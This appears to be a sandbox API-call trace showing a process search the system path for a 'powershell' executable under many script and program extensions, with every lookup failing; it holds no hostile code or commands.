	[0506.081] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.082] SetErrorMode (uMode=0x1) returned 0x1
	[0506.082] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.089] SetErrorMode (uMode=0x1) returned 0x1
	[0506.091] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.091] SetErrorMode (uMode=0x1) returned 0x1
	[0506.091] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.760] SetErrorMode (uMode=0x1) returned 0x1
	[0506.761] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.761] SetErrorMode (uMode=0x1) returned 0x1
	[0506.762] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.771] SetErrorMode (uMode=0x1) returned 0x1
	[0506.772] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.772] SetErrorMode (uMode=0x1) returned 0x1
	[0506.772] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.780] SetErrorMode (uMode=0x1) returned 0x1
	[0506.781] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.781] SetErrorMode (uMode=0x1) returned 0x1
	[0506.781] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.789] SetErrorMode (uMode=0x1) returned 0x1
	[0506.790] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.791] SetErrorMode (uMode=0x1) returned 0x1
	[0506.791] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.798] SetErrorMode (uMode=0x1) returned 0x1
	[0506.800] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.800] SetErrorMode (uMode=0x1) returned 0x1
	[0506.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.375] SetErrorMode (uMode=0x1) returned 0x1
	[0507.376] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0507.376] SetErrorMode (uMode=0x1) returned 0x1
	[0507.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.384] SetErrorMode (uMode=0x1) returned 0x1
	[0507.385] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0507.385] SetErrorMode (uMode=0x1) returned 0x1
	[0507.385] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.393] SetErrorMode (uMode=0x1) returned 0x1
	[0507.395] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0507.395] SetErrorMode (uMode=0x1) returned 0x1
	[0507.395] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.402] SetErrorMode (uMode=0x1) returned 0x1
	[0507.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.404] SetErrorMode (uMode=0x1) returned 0x1
	[0507.404] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.405] SetErrorMode (uMode=0x1) returned 0x1
	[0507.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.405] SetErrorMode (uMode=0x1) returned 0x1
	[0507.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.406] SetErrorMode (uMode=0x1) returned 0x1
	[0507.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.406] SetErrorMode (uMode=0x1) returned 0x1
	[0507.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.407] SetErrorMode (uMode=0x1) returned 0x1
	[0507.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.407] SetErrorMode (uMode=0x1) returned 0x1
	[0507.407] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.407] SetErrorMode (uMode=0x1) returned 0x1
	[0507.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.408] SetErrorMode (uMode=0x1) returned 0x1
	[0507.408] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.408] SetErrorMode (uMode=0x1) returned 0x1
	[0507.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.408] SetErrorMode (uMode=0x1) returned 0x1
	[0507.408] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.409] SetErrorMode (uMode=0x1) returned 0x1
	[0507.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.409] SetErrorMode (uMode=0x1) returned 0x1
	[0507.409] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.409] SetErrorMode (uMode=0x1) returned 0x1
	[0507.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.410] SetErrorMode (uMode=0x1) returned 0x1
	[0507.410] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.410] SetErrorMode (uMode=0x1) returned 0x1
	[0507.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.988] SetErrorMode (uMode=0x1) returned 0x1
	[0507.988] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.988] SetErrorMode (uMode=0x1) returned 0x1
	[0507.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.989] SetErrorMode (uMode=0x1) returned 0x1
	[0507.989] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.989] SetErrorMode (uMode=0x1) returned 0x1
	[0507.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.989] SetErrorMode (uMode=0x1) returned 0x1
	[0507.989] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.989] SetErrorMode (uMode=0x1) returned 0x1
	[0507.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.990] SetErrorMode (uMode=0x1) returned 0x1
	[0507.990] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.990] SetErrorMode (uMode=0x1) returned 0x1
	[0507.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.990] SetErrorMode (uMode=0x1) returned 0x1
	[0507.991] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.991] SetErrorMode (uMode=0x1) returned 0x1
	[0507.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.991] SetErrorMode (uMode=0x1) returned 0x1
	[0507.991] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.991] SetErrorMode (uMode=0x1) returned 0x1
	[0507.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0507.992] SetErrorMode (uMode=0x1) returned 0x1
	[0507.992] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.992] SetErrorMode (uMode=0x1) returned 0x1
	[0507.992] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.992] SetErrorMode (uMode=0x1) returned 0x1
	[0507.992] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.993] SetErrorMode (uMode=0x1) returned 0x1
	[0507.993] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.993] SetErrorMode (uMode=0x1) returned 0x1
	[0507.993] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.993] SetErrorMode (uMode=0x1) returned 0x1
	[0507.993] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.994] SetErrorMode (uMode=0x1) returned 0x1
	[0507.994] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.994] SetErrorMode (uMode=0x1) returned 0x1
	[0507.994] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0507.994] SetErrorMode (uMode=0x1) returned 0x1
	[0507.994] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0507.995] SetErrorMode (uMode=0x1) returned 0x1
